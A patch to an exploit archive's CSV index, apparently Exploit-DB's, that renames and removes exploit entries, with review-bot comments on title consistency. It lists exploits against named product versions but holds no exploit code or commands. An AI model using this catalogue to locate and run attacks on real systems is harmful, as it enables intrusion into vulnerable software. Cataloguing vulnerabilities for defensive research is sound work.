@@ -13497,7 +13508,7 @@ id,file,description,date,author,platform,type,port 23880,platforms/windows/remote/23880.txt,"HP Web Jetadmin 7.5.2456 - Arbitrary Command Execution",2004-03-24,wirepair,windows,remote,0 23881,platforms/linux/remote/23881.txt,"Emil 2.x - Multiple Buffer Overrun / Format String Vulnerabilities",2004-03-25,"Ulf Harnhammar",linux,remote,0 23887,platforms/windows/remote/23887.rb,"Enterasys NetSight - 'nssyslogd.exe' Buffer Overflow (Metasploit)",2013-01-04,Metasploit,windows,remote,0 -23969,platforms/windows/remote/23969.rb,"IBM Cognos - 'tm1admsd.exe' Overflow (Metasploit)",2013-01-08,Metasploit,windows,remote,0 +23969,platforms/windows/remote/23969.rb,"IBM Cognos - 'tm1admsd.exe' Remote Overflow (Metasploit)",2013-01-08,Metasploit,windows,remote,0 23893,platforms/multiple/remote/23893.txt,"WebCT Campus Edition 3.8/4.x - HTML Injection",2004-03-29,"Simon Boulet",multiple,remote,0 23903,platforms/windows/remote/23903.html,"Microsoft Internet Explorer 6 - HTML Form Status Bar Misrepresentation",2004-03-31,http-equiv,windows,remote,0 23905,platforms/windows/remote/23905.txt,"ADA IMGSVR 0.4 - Remote Directory Listing",2004-04-01,"Donato Ferrante & Dr_insane",windows,remote,0 
@@ -13704,7 +13715,7 @@ id,file,description,date,author,platform,type,port 24874,platforms/multiple/remote/24874.rb,"Apache Struts - 'ParametersInterceptor' Remote Code Execution (Metasploit)",2013-03-22,Metasploit,multiple,remote,0 24875,platforms/windows/remote/24875.rb,"Sami FTP Server - LIST Command Buffer Overflow (Metasploit)",2013-03-22,Metasploit,windows,remote,0 24876,platforms/windows/remote/24876.rb,"Cool PDF Image Stream - Buffer Overflow (Metasploit)",2013-03-22,Metasploit,windows,remote,0 -24886,platforms/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' 'WzTitle' Remote",2013-03-25,Dr_IDE,windows,remote,0 +24886,platforms/windows/remote/24886.html,"Mitsubishi MX ActiveX Component 3 - 'ActUWzd.dll' 'WzTitle' Remote Heap Spray",2013-03-25,Dr_IDE,windows,remote,0 24887,platforms/windows/remote/24887.rb,"KingView - Log File Parsing Buffer Overflow (Metasploit)",2013-03-25,Metasploit,windows,remote,0 24888,platforms/linux/remote/24888.rb,"Mutiny - Remote Command Execution (Metasploit)",2013-03-25,Metasploit,linux,remote,0 24891,platforms/windows/remote/24891.rb,"HP Intelligent Management Center - Arbitrary File Upload (Metasploit)",2013-03-26,Metasploit,windows,remote,0 
@@ -13910,7 +13921,7 @@ id,file,description,date,author,platform,type,port 25975,platforms/linux/remote/25975.rb,"MiniUPnPd 1.0 - Stack Buffer Overflow Remote Code Execution (Metasploit)",2013-06-05,Metasploit,linux,remote,5555 25979,platforms/windows/remote/25979.rb,"Oracle WebCenter Content - 'CheckOutAndOpen.dll' ActiveX Remote Code Execution (Metasploit)",2013-06-05,Metasploit,windows,remote,0 25980,platforms/multiple/remote/25980.rb,"Apache Struts - includeParams Remote Code Execution (Metasploit)",2013-06-05,Metasploit,multiple,remote,8080 -25986,platforms/php/remote/25986.txt,"Plesk < 9.5.4 - Remote",2013-06-05,kingcope,php,remote,0 +25986,platforms/php/remote/25986.txt,"Plesk < 9.5.4 - Remote Command Execution",2013-06-05,kingcope,php,remote,0 25987,platforms/hardware/remote/25987.txt,"Xpient - Cash Drawer Operation",2013-06-05,"Core Security",hardware,remote,0 25988,platforms/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 - MOD_ORADAV Access Control",2003-02-13,"David Litchfield",multiple,remote,0 25989,platforms/windows/remote/25989.txt,"NullSoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow",2005-07-15,"Leon Juranic",windows,remote,0 
@@ -14107,7 +14118,7 @@ id,file,description,date,author,platform,type,port 28209,platforms/multiple/remote/28209.txt,"FLV Players 8 - 'player.php?url' Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 28210,platforms/multiple/remote/28210.txt,"FLV Players 8 - 'popup.php?url' Cross-Site Scripting",2006-07-12,xzerox,multiple,remote,0 28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 - 'mso.dll' '.PPT' Processing Code Execution",2006-07-14,"naveed afzal",windows,remote,0 -28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 - 'powerpnt.exe'",2006-07-14,"naveed afzal",windows,remote,0 +28225,platforms/windows/remote/28225.c,"Microsoft PowerPoint 2003 - 'powerpnt.exe' Remote Overflow",2006-07-14,"naveed afzal",windows,remote,0 28226,platforms/windows/remote/28226.c,"Microsoft PowerPoint 2003 - '.ppt' File Closure Memory Corruption",2006-07-14,"naveed afzal",windows,remote,0 28235,platforms/windows/remote/28235.c,"RARLAB WinRAR 3.x - LHA Filename Handling Buffer Overflow",2006-07-18,"Ryan Smith",windows,remote,0 28245,platforms/hardware/remote/28245.pl,"Cisco Security Monitoring Analysis and Response System JBoss - Command Execution",2006-07-19,"Jon Hart",hardware,remote,0 
@@ -14163,7 +14174,7 @@ id,file,description,date,author,platform,type,port 28760,platforms/php/remote/28760.php,"PHP 3 < 5 - ZendEngine ECalloc Integer Overflow",2006-10-05,anonymous,php,remote,0 28765,platforms/windows/remote/28765.c,"Computer Associates Products Message Engine RPC Server - Multiple Buffer Overflow Vulnerabilities (1)",2006-10-05,LSsec.com,windows,remote,0 28766,platforms/windows/remote/28766.py,"Computer Associates Products Message Engine RPC Server - Multiple Buffer Overflow Vulnerabilities (2)",2006-10-05,LSsec.com,windows,remote,0 -28809,platforms/windows/remote/28809.rb,"HP LoadRunner - 'magentproc.exe' Overflow (Metasploit)",2013-10-08,Metasploit,windows,remote,443 +28809,platforms/windows/remote/28809.rb,"HP LoadRunner - 'magentproc.exe' Remote Overflow (Metasploit)",2013-10-08,Metasploit,windows,remote,443 28810,platforms/unix/remote/28810.rb,"GestioIP - Remote Command Execution (Metasploit)",2013-10-08,Metasploit,unix,remote,0 28835,platforms/novell/remote/28835.pl,"Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (1)",2006-10-21,"Manuel Santamarina Suarez",novell,remote,0 28836,platforms/novell/remote/28836.c,"Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (2)",2006-10-30,Expanders,novell,remote,0 
@@ -14330,7 +14341,6 @@ id,file,description,date,author,platform,type,port 30279,platforms/multiple/remote/30279.txt,"SAP Internet Graphics Server 7.0 - 'ADM:GETLOGFILE?PARAMS' Cross-Site Scripting",2007-07-05,"Mark Litchfield",multiple,remote,0 30281,platforms/windows/remote/30281.txt,"Microsoft .Net Framework 2.0 - Multiple Null Byte Injection Vulnerabilities",2007-07-06,"Paul Craig",windows,remote,0 30285,platforms/linux/remote/30285.txt,"Microsoft Internet Explorer and Mozilla Firefox - URI Handler Command Injection",2007-07-10,"Thor Larholm",linux,remote,0 -30286,platforms/linux/remote/30286.txt,"ImgSvr 0.6 - 'Template' Local File Inclusion",2007-07-10,"Tim Brown",linux,remote,0 30287,platforms/windows/remote/30287.txt,"TippingPoint IPS - Unicode Character Detection Bypass",2007-07-10,Security-Assessment.com,windows,remote,0 30288,platforms/multiple/remote/30288.txt,"Adobe Flash Player 8.0.24 - '.SWF' File Handling Remote Code Execution",2007-07-10,"Stefano DiPaola",multiple,remote,0 30291,platforms/linux/remote/30291.txt,"ClamAV / UnRAR - .RAR Handling Remote Null Pointer Dereference",2007-07-11,"Metaeye Security Group",linux,remote,0 
@@ -14386,7 +14396,7 @@ id,file,description,date,author,platform,type,port 32391,platforms/hardware/remote/32391.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 33141,platforms/php/remote/33141.rb,"Alienvault Open Source SIEM (OSSIM) - SQL Injection / Remote Code Execution (Metasploit)",2014-05-02,Metasploit,php,remote,443 32390,platforms/hardware/remote/32390.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (1)",2008-09-17,"Jeremy Brown",hardware,remote,0 -32277,platforms/lin_x86-64/remote/32277.txt,"Nginx 1.4.0 (Generic Linux x64) - Remote",2014-03-15,sorbo,lin_x86-64,remote,0 +32277,platforms/lin_x86-64/remote/32277.txt,"Nginx 1.4.0 (Generic Linux x64) - Remote Overflow",2014-03-15,sorbo,lin_x86-64,remote,0 30582,platforms/windows/remote/30582.html,"WinSCP 4.0.3 - URL Protocol Handler Arbitrary File Access",2007-09-13,Kender.Security,windows,remote,0 30589,platforms/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,windows,remote,0 30600,platforms/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow",2007-09-20,7jdg,windows,remote,0 
@@ -14469,7 +14479,7 @@ id,file,description,date,author,platform,type,port 31133,platforms/hardware/remote/31133.txt,"F5 BIG-IP 9.4.3 - Web Management Interface Cross-Site Request Forgery",2008-02-11,nnposter,hardware,remote,0 31149,platforms/windows/remote/31149.txt,"Sentinel Protection Server 7.x/Keys Server 1.0.x - Backslash Directory Traversal",2008-02-11,"Luigi Auriemma",windows,remote,0 31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 - Directory Traversal / Denial of Service",2008-02-12,"Luigi Auriemma",windows,remote,0 -40760,platforms/windows/remote/40760.rb,"Easy Internet Sharing Proxy Server 2.2 - Overflow (SEH) (Metasploit)",2016-11-15,"Tracy Turben",windows,remote,0 +40760,platforms/windows/remote/40760.rb,"Easy Internet Sharing Proxy Server 2.2 - Remote Overflow (SEH) (Metasploit)",2016-11-15,"Tracy Turben",windows,remote,0 31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution",2014-02-16,Rew,hardware,remote,0 31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX 'IconCreate Method' Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0 31181,platforms/windows/remote/31181.rb,"HP Data Protector - Backup Client Service Directory Traversal (Metasploit)",2014-01-24,Metasploit,windows,remote,5555 
@@ -14760,7 +14770,7 @@ id,file,description,date,author,platform,type,port 33079,platforms/multiple/remote/33079.txt,"Oracle WebLogic Server 10.3 - 'console-help.portal' Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",multiple,remote,0 33081,platforms/multiple/remote/33081.cpp,"Oracle 9i/10g Database - Remote Network Authentication",2009-06-14,"Dennis Yurichev",multiple,remote,0 33082,platforms/multiple/remote/33082.txt,"Oracle 10g Secure Enterprise Search - 'search_p_groups' Cross-Site Scripting",2009-06-14,"Alexandr Polyakov",multiple,remote,0 -33084,platforms/multiple/remote/33084.txt,"Oracle 9i/10g Database - Network Foundation Remote",2009-06-14,"Dennis Yurichev",multiple,remote,0 +33084,platforms/multiple/remote/33084.txt,"Oracle 9i/10g Database - Network Foundation Remote Overflow",2009-06-14,"Dennis Yurichev",multiple,remote,0 33089,platforms/windows/remote/33089.pl,"iDefense COMRaider - ActiveX Control Multiple Insecure Method Vulnerabilities",2009-06-17,"Khashayar Fereidani",windows,remote,0 33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 - '/dhost/modules?I:' Buffer Overflow",2009-11-12,HACKATTACK,novell,remote,0 33580,platforms/hardware/remote/33580.txt,"COMTREND CT-507 IT ADSL Router - 'scvrtsrv.cmd' Cross-Site Scripting",2010-01-29,Yoyahack,hardware,remote,0 
@@ -14823,7 +14833,7 @@ id,file,description,date,author,platform,type,port 33499,platforms/multiple/remote/33499.txt,"thttpd 2.24 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33500,platforms/multiple/remote/33500.txt,"mini_httpd 1.18 - HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33501,platforms/windows/remote/33501.txt,"Cherokee 0.99.30 - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,windows,remote,0 -33502,platforms/windows/remote/33502.txt,"Yaws 1.55 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,windows,remote,0 +33502,platforms/windows/remote/33502.txt,"Yaws 1.55 - 'Logs' Terminal Escape Sequence Command Injection",2010-01-11,evilaliv3,windows,remote,0 33503,platforms/multiple/remote/33503.txt,"Orion Application Server 2.0.7 - 'Terminal Escape Sequence in Logs' Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33504,platforms/multiple/remote/33504.txt,"BOA Web Server 0.94.x - Terminal Escape Sequence in Logs Command Injection",2010-01-11,evilaliv3,multiple,remote,0 33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming - Arbitrary File Upload (Metasploit)",2014-05-26,Metasploit,multiple,remote,9855 
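Review bot: after this change the four evilaliv3 terminal-escape rows in this hunk carry three different phrasings: 33502 becomes "'Logs' Terminal Escape Sequence Command Injection", 33503 keeps "'Terminal Escape Sequence in Logs' Command Injection", and 33501/33504 use the unquoted "Terminal Escape Sequence in Logs Command Injection". If 33502 is being normalised, normalise 33503 in the same change, and prefer the unquoted form already used by 33501 and 33504.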
@@ -14940,7 +14950,6 @@ id,file,description,date,author,platform,type,port 34064,platforms/hardware/remote/34064.rb,"D-Link HNAP - Request Remote Buffer Overflow (Metasploit)",2014-07-14,Metasploit,hardware,remote,80 34065,platforms/hardware/remote/34065.rb,"D-Link Devices - Unauthenticated UPnP M-SEARCH Multicast Command Injection (Metasploit)",2014-07-14,Metasploit,hardware,remote,1900 34066,platforms/windows/remote/34066.py,"HP Data Protector Manager 8.10 - Remote Command Execution",2014-07-14,Polunchis,windows,remote,0 -34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Local File Inclusion",2010-06-21,"Pouya Daneshmand",multiple,remote,0 34088,platforms/android/remote/34088.html,"Boat Browser 8.0/8.0.1 - Remote Code Execution",2014-07-16,c0otlass,android,remote,0 34156,platforms/windows/remote/34156.pl,"TurboFTP Server 1.20.745 - Directory Traversal",2010-06-17,leinakesi,windows,remote,0 34115,platforms/windows/remote/34115.txt,"McAfee Unified Threat Management Firewall 4.0.6 - 'page' Cross-Site Scripting",2010-06-07,"Adam Baldwin",windows,remote,0 
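Review bot: 34136 ("Plesk Server Administrator (PSA) - 'locale' Local File Inclusion") is dropped with no replacement row in this hunk; as with the other removals in this patch, confirm that platforms/multiple/remote/34136.txt is also deleted or that the row reappears elsewhere, otherwise the file is orphaned.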
@@ -15218,7 +15227,7 @@ id,file,description,date,author,platform,type,port 35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass",2015-01-28,"Jeremy Brown",windows,remote,0 35925,platforms/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway - Multiple Vulnerabilities",2011-07-05,"Zsolt Imre",hardware,remote,0 35928,platforms/windows/remote/35928.html,"Pro Softnet IDrive Online Backup 3.4.0 - ActiveX 'SaveToFile()' Arbitrary File Overwrite",2011-07-06,"High-Tech Bridge SA",windows,remote,0 -35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote",2015-01-29,"Nicholas Lemonias",hardware,remote,0 +35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Overflow",2015-01-29,"Nicholas Lemonias",hardware,remote,0 35948,platforms/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - ASLR + DEP Bypass",2015-01-30,Rh0,windows,remote,0 35949,platforms/windows/remote/35949.txt,"Symantec Encryption Management Server < 3.2.0 MP6 - Remote Command Injection",2015-01-30,"Paul Craig",windows,remote,0 35961,platforms/hp-ux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",2015-01-30,"Juttikhun Khamchaiyaphum",hp-ux,remote,0 
@@ -15678,7 +15687,7 @@ id,file,description,date,author,platform,type,port 40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80 40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit) (3)",2016-07-29,xort,linux,remote,8000 40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Command Execution (Metasploit)",2016-07-29,xort,linux,remote,8000 -40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - Overflow (Egghunter) (SEH)",2016-07-29,ch3rn0byl,windows,remote,80 +40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - Remote Overflow (Egghunter) (SEH)",2016-07-29,ch3rn0byl,windows,remote,80 40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0 40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 < 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0 40232,platforms/linux/remote/40232.py,"FreePBX 13/14 - Remote Command Execution / Privilege Escalation",2016-08-12,pgt,linux,remote,0 
@@ -15687,7 +15696,7 @@ id,file,description,date,author,platform,type,port 40279,platforms/windows/remote/40279.py,"Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067)",2016-02-26,ohnozzy,windows,remote,0 40235,platforms/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote,0 40258,platforms/hardware/remote/40258.txt,"Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass",2016-08-18,"Shadow Brokers",hardware,remote,161 -40275,platforms/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote",2016-08-19,"Shadow Brokers",hardware,remote,0 +40275,platforms/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Command Execution",2016-08-19,"Shadow Brokers",hardware,remote,0 40294,platforms/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,php,remote,80 40436,platforms/android/remote/40436.rb,"Google Android 5.0 < 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote,0 40445,platforms/windows/remote/40445.txt,"DWebPro 8.4.2 - Multiple Vulnerabilities",2016-10-03,Tulpa,windows,remote,0 
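Review bot: the edit to 40275 adds a classification ("Remote Command Execution") that the old title did not carry, while the neighbouring Shadow Brokers row 40258 is classified specifically ("'EXTRABACON' Authentication Bypass"); confirm the new class against the contents of 40275.txt rather than defaulting to RCE for an unclassified "Remote" entry.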
@@ -15837,7 +15846,7 @@ id,file,description,date,author,platform,type,port 41975,platforms/windows/remote/41975.txt,"Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remote Type Confusion",2017-05-09,"Google Security Research",windows,remote,0 41978,platforms/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",multiple,remote,0 41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,"Mehmet Ince",python,remote,80 -41992,platforms/windows/remote/41992.rb,"Microsoft IIS - WebDav 'ScStoragePathFromUrl' Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0 +41992,platforms/windows/remote/41992.rb,"Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0 41996,platforms/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",php,remote,0 42010,platforms/linux/remote/42010.rb,"Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit)",2017-05-15,Metasploit,linux,remote,0 42011,platforms/windows/remote/42011.py,"LabF nfsAxe 3.7 FTP Client - Buffer Overflow (SEH)",2017-05-15,Tulpa,windows,remote,0 
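Review bot: 41992 is renamed to "WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit)" while 42010 two rows below uses "pmmasterd Buffer Overflow (Metasploit)" for the same class; suggest "Remote Buffer Overflow" for 41992 so the two Metasploit rows in this hunk use one term.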
@@ -16621,10 +16630,10 @@ id,file,description,date,author,platform,type,port 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 -53,platforms/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote",2003-07-10,knight420,cgi,webapps,0 +53,platforms/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote Code Execution",2003-07-10,knight420,cgi,webapps,0 38772,platforms/hardware/webapps/38772.txt,"ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,80 -137,platforms/php/webapps/137.pl,"phpBB 2.0.6 - 'search_id' SQL Injection MD5 Hash Remote",2003-12-21,RusH,php,webapps,0 -138,platforms/php/webapps/138.pl,"PHP-Nuke 6.9 - 'cid' SQL Injection Remote",2003-12-21,RusH,php,webapps,0 +137,platforms/php/webapps/137.pl,"phpBB 2.0.6 - 'search_id' SQL Injection / MD5 Hash",2003-12-21,RusH,php,webapps,0 +138,platforms/php/webapps/138.pl,"PHP-Nuke 6.9 - 'cid' SQL Injection",2003-12-21,RusH,php,webapps,0 177,platforms/cgi/webapps/177.pl,"Poll It CGI 2.0 - Multiple Vulnerabilities",2000-11-15,keelis,cgi,webapps,0 179,platforms/cgi/webapps/179.c,"News Update 1.1 - Change Admin Password",2000-11-15,morpheus[bd],cgi,webapps,0 187,platforms/cgi/webapps/187.pl,"ListMail 112 - Command Execution",2000-11-17,teleh0r,cgi,webapps,0 
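Review bot: the new titles for 137 and 138 use " / " ("'search_id' SQL Injection / MD5 Hash"), but elsewhere in this file that separator lists distinct vulnerability classes (e.g. "Cross-Site Scripting / SQL Injection"); the MD5 hash here is what the SQL injection retrieves, not a second bug. 44 in this same hunk already shows the form for that case, "SQL Injection Password Disclosure", so "'search_id' SQL Injection MD5 Hash Disclosure" would be consistent with it.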
@@ -16634,7 +16643,7 @@ id,file,description,date,author,platform,type,port 309,platforms/php/webapps/309.c,"phpMyAdmin 2.5.7 - Remote code Injection",2004-07-04,"Nasir Simbolon",php,webapps,0 384,platforms/php/webapps/384.txt,"PHP 4.3.7 - 'php-exec-dir' Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0 406,platforms/php/webapps/406.pl,"phpMyWebhosting - SQL Injection",2004-08-20,"Noam Rathaus",php,webapps,0 -407,platforms/cgi/webapps/407.txt,"AWStats 5.0 < 6.3 - Input Validation Hole in 'logfile'",2004-08-21,"Johnathan Bat",cgi,webapps,0 +407,platforms/cgi/webapps/407.txt,"AWStats 5.0 < 6.3 - 'logfile' File Inclusion / Command Execution",2004-08-21,"Johnathan Bat",cgi,webapps,0 430,platforms/php/webapps/430.txt,"TorrentTrader 1.0 RC2 - SQL Injection",2004-09-01,aCiDBiTS,php,webapps,0 436,platforms/php/webapps/436.txt,"PHP-Nuke 7.4 - Privilege Escalation",2004-09-08,mantra,php,webapps,0 464,platforms/cgi/webapps/464.txt,"Turbo Seek - Null Byte Error Discloses Files",2004-09-13,durito,cgi,webapps,0 
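Review bot: the new title for 407 asserts two vulnerability classes ("'logfile' File Inclusion / Command Execution") where the old one asserted none ("Input Validation Hole"); confirm both from 407.txt and keep only the class(es) the file actually describes, since " / " in this file denotes separate vulnerabilities (compare 1804, "Remote File Inclusion / Authentication Bypass").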
@@ -16653,21 +16662,21 @@ id,file,description,date,author,platform,type,port 659,platforms/cgi/webapps/659.txt,"Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal",2004-11-25,"Zero X",cgi,webapps,0 673,platforms/php/webapps/673.pl,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0 676,platforms/php/webapps/676.c,"phpBB 1.0.0/2.0.10 - 'admin_cash.php' Remote Code Execution",2004-12-05,evilrabbi,php,webapps,0 -697,platforms/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote",2004-12-17,overdose,php,webapps,0 -702,platforms/php/webapps/702.pl,"phpBB - highlight Arbitrary File Upload 'Santy.A'",2004-12-22,anonymous,php,webapps,0 +697,platforms/php/webapps/697.c,"PHP 4.3.9 + phpBB 2.x - 'Unserialize()' Remote Information Leak",2004-12-17,overdose,php,webapps,0 +702,platforms/php/webapps/702.pl,"phpBB < 2.0.10 - 'Santy.A Worm' 'highlight' Arbitrary File Upload",2004-12-22,anonymous,php,webapps,0 703,platforms/php/webapps/703.pl,"phpMyChat 0.14.5 - Remote Improper File Permissions",2004-12-22,sysbug,php,webapps,0 -704,platforms/php/webapps/704.pl,"e107 - 'include()' Remote",2004-12-22,sysbug,php,webapps,80 +704,platforms/php/webapps/704.pl,"e107 - 'include()' Remote File Upload",2004-12-22,sysbug,php,webapps,80 720,platforms/php/webapps/720.pl,"Sanity.b - phpBB 2.0.10 Bot Install (AOL/Yahoo Search)",2004-12-25,anonymous,php,webapps,0 725,platforms/php/webapps/725.pl,"PHPInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion",2004-12-25,anonymous,php,webapps,0 737,platforms/php/webapps/737.txt,"QwikiWiki - Directory Traversal",2005-01-04,Madelman,php,webapps,0 -740,platforms/php/webapps/740.pl,"phpBB 2.0.10 - Bot Install Altavista 'ssh.D.Worm'",2005-01-04,"Severino Honorato",php,webapps,0 +740,platforms/php/webapps/740.pl,"phpBB 2.0.10 - 'ssh.D.Worm' Bot Install Altavista",2005-01-04,"Severino Honorato",php,webapps,0 754,platforms/php/webapps/754.pl,"ITA Forum 1.49 - SQL 
Injection",2005-01-13,RusH,php,webapps,0 772,platforms/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (C)",2005-01-25,THUNDER,cgi,webapps,0 773,platforms/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - configdir Remote Command Execution (Perl)",2005-01-25,GHC,cgi,webapps,0 774,platforms/php/webapps/774.pl,"Siteman 1.1.10 - Remote Administrative Account Addition",2005-01-25,"Noam Rathaus",php,webapps,0 786,platforms/php/webapps/786.pl,"LiteForum 2.1.1 - SQL Injection",2005-02-04,RusH,php,webapps,0 790,platforms/cgi/webapps/790.pl,"PerlDesk 1.x - SQL Injection",2005-02-05,deluxe89,cgi,webapps,0 -800,platforms/php/webapps/800.txt,"PostNuke PostWrap Module - Remote",2005-02-08,"ALBANIA SECURITY",php,webapps,0 +800,platforms/php/webapps/800.txt,"PostNuke PostWrap Module - Remote File Inclusion / Code Execution",2005-02-08,"ALBANIA SECURITY",php,webapps,0 801,platforms/php/webapps/801.c,"PHP-Nuke 7.4 - Admin",2005-02-09,Silentium,php,webapps,0 807,platforms/php/webapps/807.txt,"MyPHP Forum 1.0 - SQL Injection",2005-02-10,GHC,php,webapps,0 808,platforms/php/webapps/808.txt,"CMScore - SQL Injection",2005-02-10,GHC,php,webapps,0 
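Review bot: the rewrite of 702 introduces a version constraint, "phpBB < 2.0.10", that the old title did not have, while 720 and 740 in this same hunk name "phpBB 2.0.10" as the version the Santy/ssh.D bots target; "<" excludes 2.0.10, so either the bound should be "<= 2.0.10" or the sibling rows are wrong. Check 702.pl before adding a range, and keep the three worm rows consistent with each other.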
@@ -16694,8 +16703,8 @@ id,file,description,date,author,platform,type,port 892,platforms/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass",2005-03-21,kre0n,php,webapps,0 897,platforms/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,php,webapps,0 901,platforms/php/webapps/901.pl,"PunBB 1.2.2 - Authentication Bypass",2005-03-29,RusH,php,webapps,0 -907,platforms/php/webapps/907.pl,"phpBB 2.0.13 - 'downloads.php' mod Remote",2005-04-02,CereBrums,php,webapps,0 -910,platforms/php/webapps/910.pl,"phpBB 2.0.13 - 'Calendar Pro' mod Remote",2005-04-04,CereBrums,php,webapps,0 +907,platforms/php/webapps/907.pl,"phpBB 2.0.13 - 'downloads.php' mod Get Hash",2005-04-02,CereBrums,php,webapps,0 +910,platforms/php/webapps/910.pl,"phpBB 2.0.13 - 'Calendar Pro' mod Get Hash",2005-04-04,CereBrums,php,webapps,0 921,platforms/php/webapps/921.sh,"PHP-Nuke 6.x < 7.6 Top module - SQL Injection",2005-04-07,"Fabrizi Andrea",php,webapps,0 922,platforms/cgi/webapps/922.pl,"The Includer CGI 1.0 - Remote Command Execution (2)",2005-04-08,GreenwooD,cgi,webapps,0 30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0 
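Review bot: 907 and 910 are retitled with "Get Hash", a phrase not used anywhere else in the file; the equivalent edit to 1049 later in this patch uses "Fetch Password Hash", and 44 uses "SQL Injection Password Disclosure". Pick one term for all three (e.g. "Password Hash Disclosure") rather than introducing two new ones in one patch.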
